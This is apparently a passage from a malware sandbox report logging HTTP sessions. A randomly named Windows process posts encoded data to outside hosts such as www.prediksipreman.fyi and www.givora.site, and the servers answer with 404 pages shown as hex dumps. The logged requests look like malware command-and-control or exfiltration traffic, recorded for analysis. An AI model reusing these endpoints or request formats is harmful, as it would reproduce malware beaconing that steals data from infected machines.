                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 53 57 54 4a 53 6b 45 59 32 73 32 67 33 30 41 51 73 75 79 42 33 77 7a 33 70 76 54 69 4a 67 49 33 6d 49 6a 54 64 4a 72 5a 67 35 68 38 36 58 5a 78 36 77 47 71 52 66 6f 79 71 75 50 2f 74 71 4c 6a 53 4e 38 45 6f 5a 6d 47 57 58 5a 46 53 33 34 41 6f 62 5a 72 75 58 62 50 66 79 2f 76 47 79 51 68 58 7a 4f 6e 50 4e 58 6f 62 76 6b 42 76 59 39 69 68 69 62 76 42 42 38 4e 35 39 55 48 70 4c 55 58 6b 4f 76 50 48 63 67 4d 56 67 62 45 36 75 4f 41 34 6f 55 4b 4b 70 6a 58 71 48 69 6c 7a 64 64 56 71 4c 59 31 2b 76 75 35 74 68 48 2b 43 48 6b 61 72 5a 6a 61 4b 43 42 2b 62 64 58 43 38 71 6d 59 48 67 61 41 50 41 63 37 4c 77 67 3d
                                                                                                      Data Ascii: _XPD90E=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgI3mIjTdJrZg5h86XZx6wGqRfoyquP/tqLjSN8EoZmGWXZFS34AobZruXbPfy/vGyQhXzOnPNXobvkBvY9ihibvBB8N59UHpLUXkOvPHcgMVgbE6uOA4oUKKpjXqHilzddVqLY1+vu5thH+CHkarZjaKCB+bdXC8qmYHgaAPAc7Lwg=
                                                                                                      Oct 22, 2024 09:05:29.601711988 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: gzip
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 22 Oct 2024 07:05:28 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close
                                                                                                      Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                                                      Data Ascii: 135AZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                                                      Oct 22, 2024 09:05:29.601767063 CEST1236INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3oeZer^o>z=
                                                                                                      Oct 22, 2024 09:05:29.601804018 CEST424INData Raw: 4c c0 ed c2 65 89 4f 16 b0 68 b4 e1 b2 d3 04 df e5 e6 76 62 49 e2 c4 b6 05 8d 71 3a dd 35 cc 74 9a ab 33 89 d6 59 71 da b5 a8 1d cc 42 9a ca 92 e8 8c 77 04 1e 43 69 bd e5 93 6d 10 a9 25 62 8e 8c b1 21 6c dc f1 18 4b d0 6a 1f eb 34 17 cc c5 49 34
                                                                                                      Data Ascii: LeOhvbIq:5t3YqBwCim%b!lKj4I4JGZf12,850nm2@gs1hquQiLOq{wKA:TZ$T\rCiIMwz tz5Jshy)Sy5>*PMQ](
                                                                                                      Oct 22, 2024 09:05:29.601840019 CEST1236INData Raw: d5 e1 7e a9 9f 63 66 29 9d c2 c9 1e 5a ec 40 b4 59 0d c3 63 21 12 6a 5a cb b1 47 66 1b ce 9a 93 d4 70 38 52 d5 39 b2 90 8b f5 01 ab c2 ad 67 4f d3 00 09 14 31 37 b8 0d 7f 48 68 ca c5 ac c9 50 c7 5b a9 0b b3 90 2b b4 04 4b eb c0 21 55 8d a1 48 b1
                                                                                                      Data Ascii: ~cf)Z@Yc!jZGfp8R9gO17HhP[+K!UH]k]*F9I?!S*@kpF38'!6I;ywV4-*"g)W3*i$v#TsT2r,.,$p][YZL'939}Zv
                                                                                                      Oct 22, 2024 09:05:29.601878881 CEST1099INData Raw: 78 3b ac 75 57 24 b9 1b ef 46 c1 4e 63 59 ed ec b4 c2 1e 1e b2 58 70 38 80 a2 1f 2e 59 c3 13 2a 8b f2 11 b2 dc 3d 08 98 0e 49 8c 86 e3 56 31 3c 99 cc f7 b4 8d f8 d0 6c 1e ce 8d 50 2e 26 05 d1 a0 fb a2 71 ac ca 3c e7 e8 68 bd 62 96 de 3e cf a5 90
                                                                                                      Data Ascii: x;uW$FNcYXp8.Y*=IV1<lP.&q<hb>gGX`c4d>f}8Dt"j2<q84bm;p6e&JaT:5aVB0t8<7s!n)*Wf-%zO`XI(B46;PIIdl


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      11192.168.2.449909162.0.215.244805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:31.491347075 CEST10835OUTPOST /3lre/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 10304
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      Origin: http://www.prediksipreman.fyi
                                                                                                      Referer: http://www.prediksipreman.fyi/3lre/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Data Raw: 5f 58 50 44 39 30 45 3d 79 34 39 39 71 4c 68 48 69 56 4a 6f 53 57 54 4a 53 6b 45 59 32 73 32 67 33 30 41 51 73 75 79 42 33 77 7a 33 70 76 54 69 4a 67 41 33 36 71 37 54 4d 61 44 5a 6e 35 68 38 33 33 5a 30 36 77 48 6f 52 66 51 32 71 75 54 77 74 73 48 6a 52 6f 77 45 71 6f 6d 47 66 58 5a 46 66 58 34 4e 73 62 59 6a 75 55 6a 55 66 7a 50 76 47 79 51 68 58 78 57 6e 66 70 6a 6f 64 76 6b 47 6f 59 39 75 6c 69 62 55 42 42 30 37 35 39 59 39 6f 36 30 58 6c 75 2f 50 43 75 49 4d 61 67 62 43 39 75 4f 59 34 6f 59 42 4b 70 58 68 71 44 6a 77 7a 65 42 56 70 76 46 73 6e 65 50 69 2f 79 72 68 58 57 6c 36 6e 2b 7a 4a 54 43 77 65 63 39 62 6c 75 36 69 4e 48 6e 6e 38 62 6a 77 7a 61 46 6d 70 39 32 38 52 4e 36 42 68 55 54 34 6e 4f 2f 75 46 49 6d 4f 31 74 66 4a 4d 2b 36 37 56 37 34 5a 47 77 68 37 4b 48 64 58 37 72 30 5a 4f 33 7a 43 71 62 32 34 45 46 4c 4d 31 6f 72 68 57 6a 55 2f 5a 70 46 61 43 6a 6e 4e 49 41 50 51 6a 6e 32 4b 64 51 4c 2b 4e 63 47 6c 76 5a 47 71 2f 67 55 76 70 77 4a 2b 4c 2f 63 35 51 48 63 64 31 39 52 55 68 7a 46 [TRUNCATED]
                                                                                                      Data Ascii: _XPD90E=y499qLhHiVJoSWTJSkEY2s2g30AQsuyB3wz3pvTiJgA36q7TMaDZn5h833Z06wHoRfQ2quTwtsHjRowEqomGfXZFfX4NsbYjuUjUfzPvGyQhXxWnfpjodvkGoY9ulibUBB0759Y9o60Xlu/PCuIMagbC9uOY4oYBKpXhqDjwzeBVpvFsnePi/yrhXWl6n+zJTCwec9blu6iNHnn8bjwzaFmp928RN6BhUT4nO/uFImO1tfJM+67V74ZGwh7KHdX7r0ZO3zCqb24EFLM1orhWjU/ZpFaCjnNIAPQjn2KdQL+NcGlvZGq/gUvpwJ+L/c5QHcd19RUhzFfL31RVoc8ZGqSXpN0XTGNoYt90B/0MqROSSuRhV/PxOVbkJxcFUoe5JJmO43KB4p2eHuz1e9/eJDiAD5Dg6wbSoI6kG9PZoAq6rMdCKVZTbxwmF65DLh52UHfYwEp5Zf0Yb92v2sZ45TgcpLQvNFoAIXdHP7VM2zttzPbtjRNK8GokWZhNirFcnFX+SQHsnYU01vsHKTN1W3Fvik40oRG0HiN96KJrIKLltjtfKXi5Y/q3+y2fOckTHcFhYdFexwsLSMd/keIfQdZhqkEs/SsWf0A+frT5ObLHkGsTO/6n6kg5KuLU1WphYZ7XsC0HPoXXLZ4X0w7ZueqTAcTtj2hQ7+s8YD96uSMBBGPdqGMb6BXYf2cTBHe7HkJhOSEp/9aiw+nyQbE9mGi7+K0KHxDiZlbrgfgN2d97bdL6UZapTR4x3ZbYykCim/HVSNDx4U9qx8pjwf0B25HnFFS89xR3xIg9iKV3D+DY3YOs6tMkP88P91Q5Wm4l1+REv1QZZE1djRwz8Qp+LEQauuBjPcuIy/BVYw7QHRBzwRON1YRXrUYLTFkNBMKlKRdVmDNCS1YLNqYZCnlUGAyRQr7YiO3icqvtjxUreErgcjQXt4Atg2OxGNv7fDK6BTyAu/+ikb+C6zHcsXvJm74RCPGpjszvgN4BEoQ48eDI [TRUNCATED]
                                                                                                      Oct 22, 2024 09:05:32.174969912 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      content-encoding: gzip
                                                                                                      vary: Accept-Encoding
                                                                                                      date: Tue, 22 Oct 2024 07:05:31 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close
                                                                                                      Data Raw: 31 33 35 41 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a eb 92 e2 4a 72 fe 7f 9e 02 b7 c3 f6 6e 68 7a 74 05 44 6f f7 ec ea 86 24 40 42 12 08 10 0e c7 09 dd 25 74 45 77 d8 f0 03 f9 35 fc 64 2e d1 dd d3 34 d3 7d 66 d6 e1 1f ae f9 d1 a8 2e 59 59 99 5f 66 d6 64 d6 6f bf fd f6 f8 4f ec 92 59 1b 0a 37 08 aa 24 fe f6 db e3 f3 9f 01 68 8f 81 6b 3a df 7e bb fc 4c dc ca 04 33 aa fc de 3d d6 61 f3 74 c7 64 69 e5 a6 d5 7d 75 ca dd bb 81 fd fc f5 74 57 b9 5d 05 f7 24 fe 32 b0 03 b3 28 dd ea a9 ae bc 7b f2 ee 53 3a a6 1d b8 f7 fd fa 22 8b af 08 a5 d9 bd dd 0f 7d ba 50 29 4c 3f 31 ff 91 15 5c 97 87 85 5b 5e 2d 41 de 51 4f cd c4 7d ba 6b 42 b7 cd b3 a2 ba 9a d6 86 4e 15 3c 39 6e 13 da ee fd e5 e3 cb 20 4c c3 2a 34 e3 fb d2 36 63 f7 09 fd fa 9d 54 15 56 b1 fb 8d 40 88 81 9c 55 83 69 56 a7 ce 23 fc dc f9 2c ca b2 3a c5 ee a0 97 db 8b b8 ec b2 7c e1 a3 17 b5 95 39 a7 c1 df 2f 53 fb cf be 79 40 3a f7 9e 99 84 f1 e9 61 40 15 60 db 2f 03 c1 8d 1b b7 0a 6d f3 cb a0 34 d3 f2 be 74 8b d0 fb cb 8f cb ca f0 ec 3e 0c 50 22 ef de [TRUNCATED]
                                                                                                      Data Ascii: 135AZJrnhztDo$@B%tEw5d.4}f.YY_fdoOY7$hk:~L3=atdi}utW]$2({S:"}P)L?1\[^-AQO}kBN<9n L*46cTV@UiV#,:|9/Sy@:a@`/m4t>P"anJ`p,#TgK{?uMSap;kWa~G*ylYXqfG}g}z@Jf]e7{.(r~tn*WZ^VfU@;{g_hue~^!8.]^}o>Z7wM3F+6)z?ulziocWPN>!Io<?>n*Kou%tt=x%woq0{=KqU6>!{6Mg[yeFd}_cg/a|*C7{Erw8az~8mpCp7_ot F}zGp&^n%>ZY)A07=_: +%n],yVCar+wt~Dry
                                                                                                      Oct 22, 2024 09:05:32.175024033 CEST212INData Raw: 33 3e 25 50 02 7f 53 c3 1b 3f 7f 4b 5c 27 34 07 7f 4a 80 23 7d 51 cc 78 44 e6 dd 9f 6f b6 b9 45 ed cd 70 2f bc 3c 2b 2f 11 ea 61 50 b8 31 f0 75 cd 8d 01 f6 73 7a 8f 05 ec a7 7d 18 04 a1 e3 b8 e9 1b 4b fd 68 df ae e2 d3 05 d9 cf 76 fd 7e de 1b fb
                                                                                                      Data Ascii: 3>%PS?K\'4J#}QxDoEp/<+/aP1usz}Khv~[>"Vx\z*/RnH_}o@Q^Xwia|S|zv]=@]ROoOg>Fz{21dWo^3
                                                                                                      Oct 22, 2024 09:05:32.175035000 CEST1236INData Raw: fe b1 86 fb 19 6f c6 65 5a 65 16 d7 d5 07 c6 f5 72 19 bf f2 1f fd ca be bd 5e 6f 3e 18 7a 3d 12 72 73 4f ef 97 dd 08 e7 e5 c2 fd ac fd 0f 00 74 13 af 3f 53 fc 1b d5 0f 9c cf 64 02 44 fb bf 70 3e 3f ba 8d ba 88 ff e4 98 95 f9 70 71 23 70 9e fa 7f
                                                                                                      Data Ascii: oeZer^o>z=rsOt?SdDp>?pq#p_ZdN/d%LPZpz4?2CYVvjCmQK!K4.fx:2ux1z2;|gYfuL>Ca!;@IMu.>%
                                                                                                      Oct 22, 2024 09:05:32.175142050 CEST1236INData Raw: cc 09 8d 73 68 79 29 53 13 79 b9 35 b8 b6 3e 0e 09 2a 50 dc 0e 97 4d 51 5d b4 82 28 aa b1 1a 29 56 5b 6a d3 dc 49 1c 0b 0e 58 72 bd 62 99 76 4d d7 e4 16 47 ca 95 18 ae c6 00 31 ed 7e cc f8 94 cb 1e 62 53 9a 44 15 c5 22 90 d4 b5 20 39 4d ee ca b5
                                                                                                      Data Ascii: shy)Sy5>*PMQ]()V[jIXrbvMG1~bSD" 9M)e1>qZB0t-Zm>Tj3V=3+L`&&WS"8ea#{Y:v\Hi\Kv^$r Rp;~cf)Z@Yc!jZGf
                                                                                                      Oct 22, 2024 09:05:32.175173044 CEST1236INData Raw: 34 05 3c 08 7a 5d 8e cb 64 13 90 a2 b0 e1 c5 76 56 2d 4e e3 5a 1e 29 2e dc 52 69 41 77 cb 94 32 4f e2 6a b1 8d 54 b2 cd e8 f9 49 83 20 47 5f 97 35 37 87 16 64 8e d1 2c e1 f1 4e e9 1d 83 8e 57 d7 ea 3e ae 05 7d b1 2b b4 12 5c ae 68 0e 59 fa 67 31
                                                                                                      Data Ascii: 4<z]dvV-NZ).RiAw2OjTI G_57d,NW>}+\hYg1.LlvtLwI*(<k<$b{JlxM=0 .cH)v Hv\d)Nkt56!]i,NKJ!"jMVx;uW$FNcYXp8.Y
                                                                                                      Oct 22, 2024 09:05:32.175410986 CEST75INData Raw: 5d 53 ff 0c 99 ef 65 f6 52 55 bc fb c6 7c 2f 30 fe f7 7f 81 12 10 3a 1a 5c 53 fb 40 65 cf 6a 33 6f 14 f2 1e 5f 8f f0 b5 d6 1e e1 e7 00 f6 78 79 27 f7 ed b7 ff 01 00 00 ff ff 03 00 94 dc 75 d4 85 27 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: ]SeRU|/0:\S@ej3o_xy'u'0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      12192.168.2.449925162.0.215.244805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:34.039135933 CEST456OUTGET /3lre/?_XPD90E=/6Vdp+1Y21llHWroV1g1nbD9sUc5jc+T517P2ezUMEZQpYm2I4KB95g+5G1ZwATxC5oRicPrlKz7UaUXu7WnGnVkV2kzsYh+hkLabXiWN1IrSGybLcPbfYA=&qp=qTZ8t28 HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Connection: close
                                                                                                      Host: www.prediksipreman.fyi
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
                                                                                                      Oct 22, 2024 09:05:34.718128920 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      keep-alive: timeout=5, max=100
                                                                                                      content-type: text/html
                                                                                                      transfer-encoding: chunked
                                                                                                      date: Tue, 22 Oct 2024 07:05:33 GMT
                                                                                                      server: LiteSpeed
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      connection: close
                                                                                                      Data Raw: 32 37 38 35 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 [TRUNCATED]
                                                                                                      Data Ascii: 2785<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404 Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; [TRUNCATED]
                                                                                                      Oct 22, 2024 09:05:34.718189001 CEST1236INData Raw: 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63
                                                                                                      Data Ascii: } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-rep
                                                                                                      Oct 22, 2024 09:05:34.718204975 CEST424INData Raw: 2d 69 6d 61 67 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                      Data Ascii: -image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address {
                                                                                                      Oct 22, 2024 09:05:34.718436003 CEST1236INData Raw: 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 70 79 72 69 67 68 74 20 7b 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .additional-info { position: relativ
                                                                                                      Oct 22, 2024 09:05:34.718451977 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a
                                                                                                      Data Ascii: display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAPAAAADqCAMAAACrxjhdAAAAt1BMVEUAAAAA
                                                                                                      Oct 22, 2024 09:05:34.718462944 CEST424INData Raw: 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34 48 38 69 49 30 67 42 32 4d 7a 66 45 63 56 33 67 42 2b 49 6b 66 44 74 62 79 43 41 54 67 74 48 42 37 6c 33 54 72 4b 55 47 32 79 57 4f 65 37 4f 32 4b 59 51
                                                                                                      Data Ascii: SkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l0b2UgO+wRtMiFCAzqpLL0So+hWmi61Nn3aqKGEzDfFrmEoKqcWS
                                                                                                      Oct 22, 2024 09:05:34.718851089 CEST1236INData Raw: 63 68 4a 69 42 41 6f 6d 6b 7a 33 78 34 33 6c 2b 6e 75 57 47 6d 57 68 6b 51 73 30 61 36 59 37 59 48 56 65 37 37 32 6d 31 74 5a 6c 55 42 45 68 4b 49 39 6b 36 6e 75 4c 45 38 62 7a 4b 56 53 45 43 45 48 65 43 5a 53 79 73 72 30 34 71 4a 47 6e 54 7a 73
                                                                                                      Data Ascii: chJiBAomkz3x43l+nuWGmWhkQs0a6Y7YHVe772m1tZlUBEhKI9k6nuLE8bzKVSECEHeCZSysr04qJGnTzsVxJoQwm7bPhQ7cza5ECGQGpg6TnjzmWBbU7tExkhVw36yz3HCm0qEvEZ9C7vDYZeWAQhnKkQUG/i7NDnCL/hwbvJr6miPKHTaOE54xpBGrl8RIXKX1bk3+A1aUhHxUte3sHEvNSIp4REdBNONA9NOWYEwuq54AhPe
                                                                                                      Oct 22, 2024 09:05:34.718867064 CEST1236INData Raw: 75 73 38 4a 6f 4c 69 35 65 31 75 32 79 57 4e 31 6b 78 64 33 55 56 39 56 58 41 64 76 6e 6a 6e 74 49 6b 73 68 31 56 33 42 53 65 2f 44 49 55 49 48 42 64 52 43 4d 4d 56 36 4f 6e 48 72 74 57 33 62 78 63 38 56 4a 56 6d 50 51 2b 49 46 51 6d 62 74 79 55
                                                                                                      Data Ascii: us8JoLi5e1u2yWN1kxd3UV9VXAdvnjntIksh1V3BSe/DIUIHBdRCMMV6OnHrtW3bxc8VJVmPQ+IFQmbtyUgejem6VszwaNJ5IQT9r8AUF04/DoMI+Nh1ZW5M4chJ5yuNRMAnv7Th0PwP74pTl9UjPZ8Gj19PYSn0S1FQG2VfGvSPqxrp52mBN6I25n2CTBOORE0/6GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD
                                                                                                      Oct 22, 2024 09:05:34.718877077 CEST424INData Raw: 58 74 65 65 43 56 37 5a 6a 67 2f 77 75 61 38 59 47 6c 33 58 76 44 55 50 79 2f 63 2f 41 76 64 34 2f 68 4e 44 53 71 65 67 51 41 41 41 41 42 4a 52 55 35 45 72 6b 4a 67 67 67 3d 3d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20
                                                                                                      Data Ascii: XteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .container { width: 70%; } .status-code { font-size: 900%; } .status-reason
                                                                                                      Oct 22, 2024 09:05:34.718892097 CEST1236INData Raw: 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61
                                                                                                      Data Ascii: <span class="status-code">404</span> <span class="status-reason">Not Found</span> </section> <section class="contact-info"> Please forward this error screen to www.prediksipreman.f
                                                                                                      Oct 22, 2024 09:05:34.723490953 CEST423INData Raw: 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 63 70 61 6e 65 6c 2e 63 6f 6d 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 63 70 61 6e 65 6c 77 68 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63
                                                                                                      Data Ascii: <a href="http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cP


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      13192.168.2.449956162.0.231.203805796C:\Program Files (x86)\PgjKoPvNGaBGFzQzhtAOvpAwRXoIkYAqOWUQHKGWvavZSrTrQxjJdAWkSRESa\eiVHpMoiongmS.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Oct 22, 2024 09:05:39.815593004 CEST712OUTPOST /855d/ HTTP/1.1
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 204
                                                                                                      Cache-Control: no-cache
                                                                                                      Connection: close
                                                                                                      Host: www.givora.site
                                                                                                      Origin: http://www.givora.site
                                                                                                      Referer: http://www.givora.site/855d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2
